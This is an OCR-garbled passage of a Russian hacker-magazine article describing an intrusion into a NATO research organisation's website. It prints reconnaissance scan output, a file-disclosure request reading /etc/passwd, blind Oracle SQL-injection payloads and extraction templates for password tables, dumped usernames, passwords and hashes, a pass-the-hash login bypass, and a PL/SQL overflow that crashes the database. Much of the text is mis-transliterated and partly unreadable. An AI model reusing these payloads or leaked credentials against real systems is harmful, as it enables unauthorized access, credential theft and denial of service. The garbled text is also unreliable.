ности, но, будучи связаны между собой, могут дать новый вектор атаки 
злоумышленнику? 

И вот вам, пожалуйста. 

РЕШИТЕЛЬНОЕ НАТО 

Как известно. Организация Североатлантического договора, извест- 
ная также под аббревиатурой НАТО, является военно-политическим 
блоком, созданным давным-давно для противодействия возможным 
военным действиям, направленным против стран Европы и Америки. 
Россия (тогда еще Советский Союз) в этот блок не вошла, потому что 
изначально предполагалось, что и она тоже может эти самые агрес- 
сивные военные действия осуществлять. 

В структуре НАТС существуют всякого рода организации, которые от- 
вечают за разработки в области безопасности — начиная от военной, 
научно-технической и заканчивая информационной. И дальше речь 



и 
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іштго цяш> 

ндд 

К(ГАМ»4РАТ ВТАШГЯ’АТ 
ОСО ОСО 

І4$В 



5ТУ 

РОО 



Іілс 

ВТСиіЛ 
Сммо №Т 



ЗІѴ 

РОС 



ілтіа 

ІАГО 

ійта 



Вот так выглядят хешИр если их привести 
в нормальный вид и сопоставить с уже 
полученными данными 



пойдет про информационную безопасность, а конкретнее — про нау- 
чный институт КезеагсЬ & ТесЬпоІоду Огдапізабоп (КТО), созданный в 
рамках НАТО. 

В нашем журнале уже писали об уязвимостях военных сайтов наших 
«союзников». Как-то раз герои информационной войны крепко подме- 
тили, что у «сетецентрических воинов» безопасность есть, информа- 
ция есть, а вот безопасность информации — увы, не на высоте. 

Ну что ж, опровергнем или подтвердим? 

ПЕРВЫЙ ОСМОТР 

Научно-исследовательская организация НАТО — предприятие не 
из маленьких. Подстать финансовому размаху и веб-сайт, который 
со временем из простой интернет-витрины вырос в целый портал, в 
дебрях которого теперь хранится даже Военная Тайна. Вот, например, 
для того, чтобы получить секретные доклады, участникам не менее 
секретных военных симпозиумов выдают логины и пароли для до- 
ступа к файловому серверу и веб-сайту КТО.МАТО.ІМТ. Все бы хорошо, 
вот только участники подкачали — живут они в разных странах и, в 
основном, за тридевять земель, а посему было велено разместить все 
это добро на выделенных серверах с подключением к сети интернет. 
Здесь сказочке конец, а дальше — начало процесса независимого 
аудита применяемых решений по защите Военной Тайны подслед- 
ственной организации. 

Рассмотрим для начала такую мелочь, как файл гоЬоІз.ІхІ:: 



Взег-адепР: * 


Візаііоіл?: 


/ітадез/ 


Візаііоѵ^: 


/ітд/ 


Візаііоіл?: 


/Ьотеріх/ 


Візаііоѵ^: 


/гпЬітд/ 


Візаііоіл?: 


/ІпсІисЗе/ 


Візаііоіл?: 


/Ьріх/ 


Візаііоіл?: 


/Маііег/ 


Візаііоіл?: 


/ІпРоРаск/ 


Візаііоіл?: 


/азрх/ 


Візаііоіл?: 


/Ьіп/ 


Візаііоіл?: 


/сді-Ьіп/ 


Візаііоіл?: 


/СопРасРВз . азрх 


Візаііоіл?: 


/СоругідЬР . ЬРт 


Візаііоіл?: 


/сзз/ 


Візаііоѵ^: 


/ВеРаіІ . азр 


Візаііоіл?: 


/епгоітепрз/ 


Візаііоѵ^: 


/ЕАО.ЬРт 


Візаііоіл?: 


/РоаЬ.ЬРт 


Візаііоіл?: 


/Рг/ 


Візаііоіл?: 


/Ьеір . ЬРт 


Візаііоіл?: 


/ррр.ррр 


Візаііоіл?: 


/Ргод/ 


Візаііоіл?: 


/РерогРз . азр 


Візаііоіл?: 


/ЗепЬАЬзРгасРВеРаіІз . азрх 


Візаііоіл?: 


/Рог . азр 
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Очень странные ошибки на сайте ФСТЭК — могут ли 
они привести к несанкционированному доступу? 



Візаііоіл? 
Візаііоіл? 
Візаііоіл? 
Візаііоіл? 
Візаііоіл? 
Візаііоіл? 
Візаііоіл? 
ЗіСетар : 



/Тахо/ 

/ѴагіаЫез . азр 
/ѵагіаЫез . азр 
/ѵос . ІіРт 
/ѵрп . ІіРтІ 
/ШеЬтаіІ . азр 
/уоигѵ73 . азр 

ІіЦЦр: //ѵллм.Піо.паРо. іпР/зіСетар .хті 



Написанный явно не в 2010 году, этот путеводитель в мир конфи- 
денциальной информации РТО содержит в себе даже указание на 
конкретный файл, который можно скачать и посмотреть (рф.ррі;). Надо 
ли говорить о необходимости использования пікіо для сканирова- 
ния типовых каталогов, если они уже весьма «удачно» перечислены 
администратором веб-сайта? Ради спортивного интереса, мы все же 
запустим пікіо и проверим, кто выиграл: 



- ЫікСо ѵ2 . 03 /2 . 04 



+ ТагдеР ІР: 

+ ТагдеР НозРпате: 
+ ТагдеР РогР : 

+ ЗРагР Тіте: 



62.23.200.67 
шт.гХіо . паРо . іпР 
80 

2010-05-08 14:00:15 



+ Зегѵег: КТА ШеЬ Зегѵег 

- /гоЬоРз.РхР - сопРаіпз 47 ' сіізаііоіл? ' епРгіез ѵ/МсІі 

зРюиІсЗ Ье тапиаііу ѵіеіл^есі. (СЕТ) 

- АІІоѵ^есІ НТТР МеРкосІЗ: ОРТІОЫЗ, ТРАСЕ, СЕТ, НЕАВ 

+ ОЗѴВВ-877: НТТР теРНосі ('АІІоѵ^' Неасіег) : 'ТРАСЕ' 

із Рурісаііу опіу изесі Рог сіеЬиддіпд апсі зРюиІсі Ье 
ЫзаЫеЬ. ТЫз теззаде Ьоез пор теап іР із ѵиІпегаЫе 
Ро ХЗТ. 

- РиЫІС НТТР МеРЬоЬз: ОРТІОВЗ, ТРАСЕ, СЕТ, НЕАВ, 

РОЗТ 

+ ОЗѴВВ-877: НТТР теРЬоЬ ('РиЫіС НеаЬег) : 'ТРАСЕ' 

із Рурісаііу опіу изеЬ Рог ЬеЬиддіпд апЬ зРюиІсі Ье 
ЬізаЫеЬ. ТЬіз теззаде Ьоез пор теап іР із ѵиІпегаЫе 
Ро ХЗТ. 

+ ОЗѴВВ-0: ЕТад ЬеаЬег РоипЬ оп зегѵег, РіеІЬз: 

0х7 03 6сЬЬ(іа14са1 : 18Ь2 

+ ОЗѴВВ-3092: СЕТ /зіРетар.хтІ : ТЬіз діѵез а пісе 
ІізРіпд оР РЬе зіРе сопРепР. 

+ 3577 іРетз сЬескеЬ: 49 іРет(з) герогРеЬ оп гетоРе 
ЬозР 

+ ЕпЬ Тіте: 2010-05-08 14:49:54 (2979 зесопЬз) 



+ 1 ЬозР(з) РезРеЬ 

ТезР ОрРіопз: -СдіЬігз а11 -ѵЬозР ілплпл?. гРо . паРо . іпР 
-ЬозР ілплпл?. гРо . паРо . ІпР ілплпл?. гРо . паРо . іпР 
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ВЗЛОМ 



‘далкаіюл - Мо^іііа ГігеІ^ох 



ІооЬ 



Ф НМрі//уѵ'^''Ѵ' гѣо, лаіо, ілі^аіп ,дф?ІорІс - . */■ 7- А ■ А ■ А - А - А - А -/ек/ра55ѵ\ сі 



ІаІе^ЖедЛіпез Рог^еАр^.сот ^ РогШеАрр^.шп №... 



и., X ^ МАТОЯЁвеагсЬ &ТесЬгіо1одѵ Огдапк... X ^ КАТО Яе^еагсіі &ТесЬпо1оду Ог.»^ X 



ЫЛТО ІІейеягсЬ апсі Тес 1 шо 1 о§)^ Ог^ашзааоп 



Е&Т Ог^пі^аііол 
Ноте 

I бепегаі Оосмшепиврп 

I 

КТО АсНѵіЪ>& 

I КТО Рніиге ЕѵепЬі 
I $евгсЬ $сіеп1зЯс РиЫіса(іоп5 

ГѴ« -І-і^Кі іі4 Г" 



Гі^ 



ЫАТО КекеагсЬ апсі Тесітоіод;)^ Ог^аіікаііоп 



Ап еітог оосиггвсі оп ІНе аегѵег ѵ^Ьеп ргосеізіп^ ЬЬе Ріеа&е сопіас^ 
ІНе зу^іет асІтіпі^Ъгаіог зЛ. ѵѵ^еЬгпа^іегФгІа.паІо.іпІ. 



НеТр конечнОр такого файла в ѴѴіпсІоѵѵз неТр зато ошибка ЬРІ в скрипте есть 



Выиграл все-таки администратор сайта (еще бы, он точно знает про 
сайт больше, чем пікіо :)), выразим ему благодарность за отличный 
справочник по скрытым страницам. Так, например, запись ѵѵеЬтаіІ. 
азр дает нам доступ к внутренней почтовой системе, а запись 
□еіаіі.азр без всяких сканеров подсказывает нам проверить уязвимо- 
сти ввода в соответствующем сценарии веб-сервера. 

Параллельно ползая по сайту и проверяя все «бізаиоѵѵ» записи в 
гоЬоІз.ІхІ:, подключим ѵѵеЬзсагаЬ. В его журналах после хождения по 
«сайтам» часто встречаются неожиданные «вкусности», о которые 
можно почесать зубы зрітар'у и ѵѵЗаГу. Только заговорили об этом, 
и тут же — хлоп, центральный скрипт, который принимает занима- 
тельный параметр «Іорісз». Очень интересным он оказывается, если 
подставить в качестве топика этот же самый скрипт: 

ІЩЦр : / /ѵгтя . гСо . паСо . іпС/Маіп . азр?Цоріс=Маіп . азр 

При этом, если файл имеет расширение .А5Р, то он интерпретирует- 
ся (например, если мы подставим «Маіп.азр» в качестве параметра 



СЕТЕЦЕНТРИЧЕСКИЕ ВОЙНЫ 



Концепция «сетецентрической войны» появилась в США в начале 
1990-х годов. В соответствии сданной концепцией предусматри- 
вается внедрение в войска передовых информационныхтехнологий 
для того, чтобы объединять рассредоточенные в обширном боевом 
пространстве разнородные силы и средства (личный состав, органы 
и пункты управления, боевого обеспечения, вооружение и военную 
технику наземного, воздушного и морского базирования). Объеди- 
нение должно происходить информационно — с формированием 
сложной сетевой архитектуры, с подключением к сети интернет. 
Американцы ожидают, что боевая эффективность формирования с 
сетевой архитектурой по сравнению с существующими возрастет 
многократно. Иными словами, обмен данными между потреби- 
телями будет осуществляться в реальном масштабе времени не 
только «по вертикали», но и «по горизонтали». Таким образом, все 
участники смогут получить всестороннюю информацию о состоянии 
на поле боя. Концепция ведения боевых действий в едином инфор- 
мационном пространстве предполагает создание системы передачи 
данных, обеспечивающей покрытие необходимойтерритории 
театра военных действий в любое время. 

I 




Онлайн-трансформер бинарных данных в ВА5Е64 
и обратно 

Іоріс, то веб-сервер уйдет в бесконечный цикл, демонстрируя нам 
Зазеркалье — бесконечные вложения Маіп.азр в самого себя, а если 
мы укажем только что найденный «рір.ррі:», то получим его бинарное 
содержимое. 

Еще одна мелочь... в нашу свинскую копилку. Тебе, наш дорогой чита- 
тель, мы оставляем возможность попробовать комбинации следующе- 
го вида: 

ІіЦЦр : / /шш . гСо . паСо . іпС/Маіп . азр?Соріс= 

/еСс/раззѵ\[сі 

ОРАСІЕ ВСЕМОГУЩИЙ, ОРАСІЕ НЕПОБЕДИМЫЙ 

Уже очень долго существует миф о том, что веб-приложения, по- 
строенные с бек-эндом в виде СУБД Огасіе, неуязвимы к таким 
атакам как 50Е-инъекции и Х55. Миф о невозможности инъекции в 
Огасіе появился из-за функции базы данных использовать метку- 
заполнитель — при подготовке запроса оператор указывает места 
(именуя или нумеруя их), где будут впоследствии размещены входные 
данные 50Е-запроса. Но на то он и миф, чтобы его кто-нибудь раз- 



► 052 
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ЫЛТО Кс^йігсЬ ііпс.1 Тссіигоіод^ѵ Ос^піадііосі 




Мы внутри и можем посмотреть на Военную Тайну 



# 



ЩТ Огвдліінціап 
Нрвч 

С«пи' ■ I Ол і: ишні Ъіііоп 
НТОАціМі^ 

ЙТ О Книге Еѵ*л1з 
іеігсіі йІціііЯі; РѵЬвсе(іеіі} 
Н«і)дл4 №ілЪи^дл Сеп(г» 

ЕІіТ С^НПІЬиІідіі 

й«*мЕ>1 ^ ТкІмюЛер 8в»гй 

НеіЬіиІ 

Пе»ѵЕІі $ ТкЬіч*ч^ 
Сл[іг4№піі)ні Сліир 
Тесііпісаі Рлл«и 
АеірСв[| Ѵріііе^ Тн;Ів)сЛар 
Ні,вііі Р« №гі й МвіІГсіла 
ІпГнінмЕІіт '5ртІят'ТлсІигюк]|у 
АпіІлН й 

5|ПІ4^ СчіК№й й Ыяігійрп 
Ьепдаті й В*с йРіЛ;* Ткйпеіер 
мкіиіііііа йIгч»^ргь^п 
што Мл 4*Шп| й №щ Лі(Іел 

ШТЮШАЙТ 




Ніе НАТО Не«лгсЬ Н ТесНпоІо^ Ог^пІіаИап 



Пн НАТО Йвнагф ажі Тесііпоіоду Ог^апІыІ^ [ЙТО) 
ртотаія апй «гяіисіі св-ор*гаЕЬе кУеіЦИк чдаіЧ*і 
ажі екіилде аС ІЕсЫіІсаІ ІпГоплаЕкіп агакні^зі НАТО 
па (нт лті Н НАТО раг1іі*П. Т1і* Іапрті ШІі 
($11а№«№* к «4<(ир №« ЦТО 4«юмѵ«»і 

чѵеі' ккпЕка ЛИ( а4*ч?ііпа е)н ытрки? ѵя^ ІУІ е1еГ?«» 

Ек№[и1і>^)« ал[| оцигаіЛопаІ {ЬтакЕ. Пііе рГС[>г( к ^ирроПе^і Іу ап ехеоіСке 
артКу, Цн ШЖагсіЬ ал 4 Т«1іЛС4йаУ А^Пку (АТД), Пит Іа ЛІТа№ Фе сОСиЬбгаСкп 
Ьу »ла«пціпа « імИі гм$« оі МиЛІНг імой<.Ьн#і, (утро&і), ап4 оПчі' Іѵііп» Іп 
іамнаІигЕ аал ііи«[ апіі «хсКалзе Ііжмііе(1аа< 

(й А'ОГІ'. .. 




А(9 4г«и Ьу НАТО $«пййгу Оег»га1 Апеіея Ро^Ь К«?пшкжп 




аі (Ы ВекІ V! >1«ѵл( №|Ь кпіКиі* № Штош 
Мйіб№г, 

Сегипчиніапт, 

ЕхасІвпсМі, 

Ьа^Іез апсі Белікгпелр 



И к а ^аиѵп І^г т* Ь» іінай аі Пн №уаі іпіНЬг№ Іог Сажала. ТИк 
дтісаіііцКійИіІопал ігнй Іс» гмк Ізжй Л№Н уияі «ік лчпуоі' ік 
етміиге Імііур Шкаі Пн баілс Цпн, Піе паЫге аі нѵіаге айП оопЛИ Ііаз вѵеАѵ«іІ 
соп&ШегаЫур аін( (Ье рас? оі Е)ыІ еѵокіПнѵ солЬпии Ю ассокгаІБр 
№ йін №0)4 нітсігаіпіу'и((>аі пн іниі кі ипг*, ііиі і рнпісі 

№а{ шалу а) оіа шійи^ѵ рапаоплц ш фк мпкл<« ня ц«<ц| лткі) оГ пнй Гцрач 
сагсЕЯ ап 1ог?1зл Періл^лнпіі. 5«тн п{ (Ьелі ніИ 4ерЪіу оп арегаЬінн алП 
іпкзІолЕ цпПет паПн)^ оолиталПк ІиЛ жалу нійаіап ккріоу илПн №? сопнпагні аі 

Пн цшм кацміі, аг №• Еинраап илкл, от №.то. 

А) ік ЬючіАту осйін'іА I ат пеі^іціЬН Іѵ Фа( №Т0 к рлорві^ 

іТтсІипП, ртарег^ в4]иІрреПр сйглркНІу Іп№!9р«гаІікь аімі ІіЛу еНеЛІ». 
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рушил (правильное понимание причин появление уязвимости — вот 
залог возможности разрушения стереотипов). Проблемы с воз- 
можностью возникновения 501-инъекции на самом деле заложены 
не столько в базе данных, сколько в программе-оболочке, которая 
реализует взаимодействие с пользователем. Для проверки достаточно 
ведь использовать несколько простых приемов. Например, добавлять 
к параметрам строку вида «+ог+сбг(77)=сбг(77)». Использование функ- 
ции сбг() позволяет избежать указания одинарных кавычек, которые 
нещадно фильтруются. 

Именно это является причиной возникновения возможности проведе- 
ния «слепой» инъекции на сайте РТО. Вот, например, запрос с такой 
инъекцией: 

метод «научного тыка» : 

ІЩЦр : / /ѵгтя . гЪо . паЪо . іпЪ/ВеЪаіІ . азр?ІВ=- 
1+ОГ+СІ1Г (77) =с1іг (77) 

работаем с СУБД Огасіе: 

ДЦЦр : / /ѵгтя . гРо . паРо . іпР/ВеРаіІ . азр?ІВ=- 
1+ОГ+1= (ЗЕВЕСТ+1+РК0М+ВВАВ) 

Собственно, с помощью этой уязвимости мы и узнали, что сзади 
(Ьаскепб) установлена СУБД Огасіе, а не Му5С1 или ЗСІіІе (кстати, 
в ней тоже возможно провести 501-инъекцию — мы писали об этом 
в майском номере]. Видимо, НАТОвские программисты слишком по- 
ложились на безопасность Огасіе и забыли элементарные правила 
безопасного секса. А зря! Одна только книжка про оракловский аудит 
от Ильи Медведовского и его сотрудников чего только стоит. 

Слепая инъекция, конечно, потребовала от нас некоторых усилий 
по автоматизации процесса. Благо, бабушкина подшивка журнала 
«Хакер» за прошлый год помогла — в ней оказалось все, что нужно 
для создания скриптов на Регі. Мы даже смогли быстро составить 
два запроса — один определяет длину строки, которую мы хотим 
«вытащить» из базы данных, а второй вытаскивает один символ из 
этой строки: 

а) запрос для получения длины строки: 

ДЦЦр: / /ѵмѵі . гбо.пабо. іпЦ/ВебаіІ . 

азр?ІВ=-1+0Е+ ( зеІесб + ІепдбД (баЫе_ 

пате) +бгот+изег_ЦаЫез+ѵ^1іеге+ ' %ЗДЕСЕ УСЛОБИЕ 



ЗАПРОСА% ' +АВВ+гоѵ^пит=1) =%ЗДЕСЕ ДЛИНА, КОТОРУЮ ПРОБЕ- 
РЯЕМ% 

б) запрос для получения строки (здесь конкретно — имени столбца в 
указанной таблице): 

Нббр: //ѵллм.гРо.пабо. іпР/ВебаіІ .азр?ІВ=- 
1+0К+ ( зеІесб+зиЬзбг ( со1итп_пате , %ЗДЕСЕ ПОЗИЦИЯ СИМБОЛА 
Б ИМЕНИ СТОЛБЦА% , 1 ) +бгот+а11_1:аЬ_со1итпз+ѵ\[}іеге+1:аЫе_ 
пате= ' . %ЗДЕСЕ ИМЯ ТАБЛИЦЫ% . ' +АМВ+ ' %ЗДЕСЕ УСЛОБИЕ ЗАПРО 
СА% ' +АМВ+гоѵ^пит=1 ) =с1іг ( %НОМЕР СИМБОЛА% ) 

Для того, чтобы получить только первую строку с данными из всего 
запроса, мы воспользовались ключевым словом гоѵѵпит диалекта 
501-базы данных Огасіе, с помощью которого можно определять 
условие над уже собранным набором строк с выходными данными. 
Использование всевозможных технологий ускорения «слепого» пере- 
бора оставляем для тренировки :). Есть, правда, один очень большой 
минус — это количество таблиц (в том числе служебных] в базах 
Огасіе. Вслепую вытаскивать всю схему таблиц — титанический труд, 
поэтому мы интересовались только таблицами, в названии которых 
есть магическое слово «РА55ѴѴ0ВВ». На рисунке приведена схема с 
наиболее интересными таблицами и столбцами. На диске к журналу ты 
найдешь скрипты, которыми можно пополнить эту схему :). 

Среди довольно большого набора таблиц наиболее интересными 
кажутся вот эти: 

КТО_МЕМБЕКЗ .МЕМБЕК_РАЗЗШКВ 
КТО_РАНЕЕ . РАЫЕН_РАЗЗШКВ 
ВЗЕК_ВЕ_ЫЫКЗ . РАЗЗШКВ 
СОЫТАСТВОСІН . СВО_РАЗЗШКВ 
АРРЫСАТІОЫВОСІН . РАЗЗШКВ 
СОЫТАСТ . СВО_РАЗЗШКВ 

Значения данных, которые в них хранятся, впечатляют не меньше, чем 
операция «Анаконда» коалиционных войск в Афганистане. 



ВЗЕКЫАМЕ : 
РАЗЗШКВ: 
ВЕ_ЫНК: 



КТАМАЗТЕК 

СІгоору 

ТЕЗТ.КТА. ІНТ 



ВЗЕКНАМЕ: ШЗЕ 
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Т Оііалі$«ітоп 
Нот« 

Овпегаі Оос ип^еп іаЦйп 

ЯТОАсйѵііік 

ВТО Гиіуге Еѵеп^ 

$еагсН ^сіепШіс РиЫісаКапз 
НіЦопаІОііЫЬикІоп СепІ7« 

Т СоаМіпАІІоп 
ПемагсЬ &ТвсНгн>1й|у Вайг<1 
На(іогіа1 Ссог4(па^г5 
Пе»йгсЬ 6^ТесКпоІо$у 
Соогдіпаііоп Огоир 
«ЬлісіІ РйПеІ5 
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ЫАТО Кейеагсіі апсі Тесішоіо^у Ог^ішіііаііоп 
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Ноте 

ОепегАІ Оосигпел^ілоп 
ВТО АсЦѵіІіеь 
ВТО Риіиге Еѵепіз 
^ігсН ^сІепШс РиЫІсаІіот 
Наііол&І К^ЫЬиЫоп Сепігез 
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Ве5«агсН & ТасЬпоІоеу Воаг<9 
НаЦопаІ Соргйіла^гі 
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Соаг^іпаІзсі'П Сігаіір 
ТесЬпісаІ Рапеіі 
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МскІеІМпе & БіішіІаНоп 
НАТО МосІеШпе & ^іітиіаіісп 
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NАТО Кей(!ЛісЬ ап(1 Тесішоіо^’ Оі^пІййпоіі 



Я&Т ОгѵапінНоп 
Ноте 

Сепегаі Оос ишеп ІаЦоп 
ВТО Ас Ііѵі!іеі 
ВТО Гишге Еѵепгз 
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Кс^сагсіі Тссішоіо^' Ог^ш5яйои 



Зазеркалье — бесконечное вложение 



В&Т Огвапѵиирп 
Ноте 

Сепегаі Ооситепіа^рп 
ВТО ЛсЦѵІЁв^ 

ВТО Риіига Еѵвпііа 
ЗаагсЬ $сЕеліЙс РиЪНсаНолі 
На^ірпаі Оі^ігіЬиНрл Сап(ге5 
нет Срог<]ііП4ііоп 
Ве^еагсЬ & ТесЬпоІбку Воагі] 
На(іоПаІ Собгсііпйіог? 
ВекеагсЬ В Тесітдіае!^ 
СоргЕПпаіірл Огорр 

ТесЪпкаІ Ралаіз^ 
дррЬ'еіі Ѵеііісіа Тес^поіо^ 

Маіп.азр в себя самого 






NАТО Исйсогсіі аііс] Тсскп^ѵіс ; 



ВВТ Огвалі»'Ноп 
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СвпйгаІ Оос итвп кжЦоп 
ВТОАсШНва 
ВТО Ти^іігв Еѵеп($ 
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ВВТ Ог^пЗааііол 
Яопѵе 

Зепагаі Оосдтап 
ЯТОАсеИ€в5 
ЯТО ТиШге Еѵепі; 



РАЗЗШОКБ: ВБСЗВиЫЫУ 
БВ_ЫЫК: ШІЗЕ_ЫЫК 

Впрочем, хранить пароли в открытом виде свойственно многим 
большим умам. Кроме того, нас больше интересуют пароли, которые 
можно использовать для входа в закрытую часть сайта. Используем 
древнегреческое знание о двоичном поиске и запустим наш скрипт 
слепого перебора: 

БВ Зсаппіпд БаЫе гБо_рапе1 

[БВС: РОБЫБ ШМВЕВ 2 9.] 

БВ ШМВЕВ ОЕ В01ДЗ ЕОБМБ: 2 9 
СеДЕіпд гоѵ^ 1 
БВ деДЕіпд рапе1_ѵ^еЬпате 

[БВС: ЕОБМБ МБМВЕВ 1.] 

[БВС: ЕОБМБ ЗУМВОЕ ' ' - 32] 

БВ 

БВ деДБіпд рапе1_раззѵ70гБ 

[БВС: ЕОБМБ МБМВЕВ 16.] 

[БВС: ЕОБМБ ЗУМВОЕ ’х' - 245] 

[БВС: ЕОБМБ ЗУМВОЕ ’і' - 191] 

[БВС: ЕОБМБ ЗУМВОЕ '$' - 36] 

[БВС: ЕОБМБ ЗУМВОЕ ’Ё' - 168] 

БВ Х1Й) 254<Ж! Д*АЕп$Ё 

БВ 245 I 191 I 201 I 41 I 122 I 24 I 60 I 198 I 33 I 196 I 42 I 192 I 116 I 164 
I 36 I 168 I 

БВ деДБіпд рапе1_питЬег 

[БВС: ЕОБМБ МБМВЕВ 7.] 

[БВС: ЕОБМБ ЗУМВОЕ 'В' - 82] 

[БВС: ЕОБМБ ЗУМВОЕ 'А' - 65] 

БВ ВТА-СЗА 

БВ деДЕіпд рапе1_а1іаз 
[БВС: ЕОБМБ МБМВЕВ 7.] 



[БВС: ЕОБМБ ЗУМВОЕ 'А' - 65] 

БВ ВТА-СЗА 

Важными столбцами из листинга для нас являются "рапеІ_ѵѵеЬпаппе" 
и "рапеІ_ра55ѵѵогб", последний хранит М05 хеши паролей. Получаем 
все хеши и ставим их на античатовский брут. Как правило, на этом за- 
канчиваются все стандартные взломы, но мы пойдем дальше. 

ПРОВЕРКА НА ДОРОГАХ 

Доступ к закрытым зонам веб-сайта можно получить, если автори- 
зоваться под паролем любого участника или сотрудника ВТО. Для 
аутентификации была использована технология "5ІМ61Е 5І6М-0М", 
которая позволяет использовать любые другие пароли от аналогичных 
хранилищ информации: 

Ріеазе аиШіепЦісаДе Во ассезз ѵ/еЬзіВе ргоДесДеБ агеаз 
апБ ЦМе ВТО соІІаЬогаВіѵе епѵігоптепР . Бзе уоиг ВТО 
соІІаЬогаДіѵе епѵігоптепР сгеБепРіаІз ог Рііе ВТО 
депегіс сгеБепРіаІз До Іод оп. 

Понятие «единого входа», о котором талдычат НАТОвские програм- 
меры, изначально предполагает, что в разных местах пользователь 
может использовать один выданный ему логин/пароль. Здесь же это 
понятие сводится к тому, что в одном месте (на сайте) можно ис- 
пользовать пароли от нескольких других мест. Таким образом, общая 
безопасность находится на уровне самого слабого сайта, пароли от 
которого могут быть введены в ВТО. НАТО. ІМТ. 

Раз уж пароли используют чуть ли не из мусорного бака, не стоит ли 
нам повнимательнее посмотреть, как они передаются на сервер? Тут 
начинается самое интересное. Оказывается, поля пользовательского 
ввода логина и пароля перед отправкой обрабатываются с помощью 
9аѵа5сгір1:-функции. Для того, чтобы это чудо инженерной мысли 
случилось, к основному НТМІ подключен файл тб5.]5, который пред- 
ставляет собой ничто иное как реализацию алгоритма М05 компанией 
В5А ПаГа ЗесигТу (они, кстати, являются основными защитниками 
информации для НАТОвских ресурсов). В конце этого файла есть за- 
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ОаіаЬаяе Іп Гаііесі 

'ШБ І5 шшЫе (о соЕшес( [о <іе5Іша1іоп. Іт'аМ ТМБ а<1(]ге^5 5іірр1і»і от сіе5Іііш1іоп І5 ооі ІІ5Іешп§. ТЫб «тог сап аЬо оссиг Ьссаизе сГішсіеф'ш^ пеіп^оік (тші^рогі ргюЫеіш. 
Ѵеіі^^ іЬа^ іЬе ТNБ паше іп Ше соппесі$Ііш§ епЪгу^ скГ іЬе О АВ ІЬг ЦКЬ ѵаИс] апс^ Ше сІаіаЬаге Іі&іеаег І5 тшшш§. 

Упс! Минус один Главный сайт 



мечательная функция рѵѵ2тсІ5(іп_рѵѵ, ои1:_ппсІ5), которая и вызывается 
при отправке логина и пароля обратно на сайт: 

сЕогт асСіоп= "сІіескісіепЦ . азр" теР]тосі= "розР " 
пате= " іЕгтІодоп" опЗиЬтіС= " геСигп зепсіВаРа ( ) ; " > 

^ипсРіоп зепсіВаЦаО 
{ 

ѵаг РОЕМ = (ЦоситепЦ . Ргтіодоп; 

рѵ^2тсі5 ( РОЕМ. МетЬегМаРккаи, РОЕМ. МетЬегМаРккаи) ; 
геРигп Ргие; 

} 

Теперь посмотрим на саму функцию рѵѵ2тб5(). Она принимает на вход 
пароль в чистом виде, вычисляет М05 от него, конвертирует полу- 
ченное бинарное 16-байтовое значение в ВА5Е64-представление и 
записывает в выходной параметр. 

тсі5 . 3 3 : 

/* 

* А ЦаѵаЗсгірР ітрІетепРаРіоп оР Рке ЕЗА ВаРа 
ЗесигіРу, Іпс . МВ5 Меззаде 

* ВідезР АІдогіРкт, аз сіеРіпесі іп ЕРС 1321. 

* Ѵегзіоп 2.1 СоругідкР (С) Раиі ВокпзРоп 1999 - 
2002 . 

* ОРкег сопРгіЬиРогз : Сгед НоІР , Апсігеѵ^? КерегР , 
Уйпаг, ВозРіпеР 

* ВізРгіЬиРесі ипсіег Рке ВЗВ Вісепзе 

* Зее кРРр : / /ра^Рюте . огд . ик/сгурР/тсіБ Рог тоге іпРо. 
*/ 

/* 

* ВРІ1 теРРюсі айсіесі Ьу тіпкпп 
*/ 

РипсРіоп рѵ^2тсі5 (раззѵ^огсі, тсіБраззѵ^огсі) { 

тсіБраззѵ\[ог(і. ѵаіие = Ьб4_тсіБ (раззѵ\?ог(і. ѵаіие) + 

// раззѵ\?ог(і. ѵаіие = 

} 

Такой изумительный карточный расклад означает, что нам НЕ НУЖНО 
взламывать хеши М05! Вместо этого мы можем просто подставить 
значение из базы данных прямо в форму отправки! Для этого вос- 
пользуемся онлайн-трансформером ВА5Е64, предварительно сделав 
бинарный файл с байтами МВ5 хеша одного из пользователей. 
Используя тоЬЬіРсопп . получаем следующие данные: 

ВЗРЕМАМЕ: ІЗТ 

РАЗЗШЕВ: АВ2Р3 8АЕР7В3162В832 624ВА7 69 83СВ2 
ВАЗР64: г384гие2Рі2ВЛТасірд80д= = 



Дальше нам очень пригодится веб-браузер Могіиа Еігеіох и его ком- 
понент ТатрегВаІа, чтобы подставить налету в Р05Т-запрос вместо 
обычных МВ5 свои данные, честно подсмотренные в базе. Это доволь- 
но тривиальный процесс, посмотреть на примеры можно в докумен- 
тации к компоненту ТаппрегВаІа... Подставляем, проверяем, давим 
кнопку «Послать»... и, как говорится в анекдоте, «детей не люблю, но 
сам процесс!». Итак, мы внутри! 

СОЛДАТ, ВЫЙТИ из СТРОЯ! 

Все бы ничего, если бы нас не жгла мысль о том, что слепой 50Е — 
это не что иное, как консоль к базе данных. Ведь с СУБД Огасіе можно 
творить такое, что никакому ЭОЕіІе и МуЭОЕ и не снилось (здесь мы 
улыбаемся и машем Александру Полякову, автору книги «Безопас- 
ность Огасіе глазами аудитора», а также Юеіепзе ЕаЬз, — не знаю, 
кто был первый в обнаружении этой уязвимости). Наш уважаемый 
коллега описывает, как можно использовать доступ к процедуре ХВВ. 
ХВВ_Р1ТВ10_РК0.Р1ТВ10_ВВ0РМЕТАВАТА, доступной для выполне- 
ния любому пользователю базы данных. Используя эту уязвимость в 
ІОд можно вызвать переполнение буфера, и служба Огасіе аварийно 
завершит свою работу. Так что, как только нам надоест баловаться с 
доступом к закрытым секциям сайта, мы делаем следующее: 

(іесіаге 

а ѵагскагЗ ( 327 67 ) ; 

Ь ѵагс1іаг2 ( 327 67 ) ; 

Ьедіп 

а : = ' ХХХХХХХХХХХХХХХХХХХХХХХХХХХХХХХХ ' ; 

Ь : = ' УУУУУУУУУУУУУУУУУУУУУУУУУУУУУУУУ ' ; 
а:=а| Іа; а:=а| |а; а:=а| |а; а:=а| |а; а:=а| |а; 
а : =а I Іа; 

Ь:=Ы ІЬ; Ь:=Ы ІЬ; Ь:=Ы |Ь; Ь:=Ы |Ь; Ь:=Ы |Ь; 

Ь:=Ы ІЬ; 

ХВВ . ХВВ_РІТЕІС_РКС . РІТЕІС_ВЕОРМРТАВАТА ( а , Ь) ; 

епЬ; 

После того, как мы запишем этот вызов в одну длинную строку запроса 
и вставим на место нашей слепой инъекции, мы сможем увидеть вот 
такую картинку. , 

КОНЕЦ СВЕТА 

Разговоры про сетецентрические войны и ведение информационной 
войны — это, конечно, хорошо. Однако опыт показывает, что простых 
разговоров мало — уж если мы анализируем сайты наших НАТОвских 
«союзников», то и они, наверное, от нас не отстают. На этом фоне 
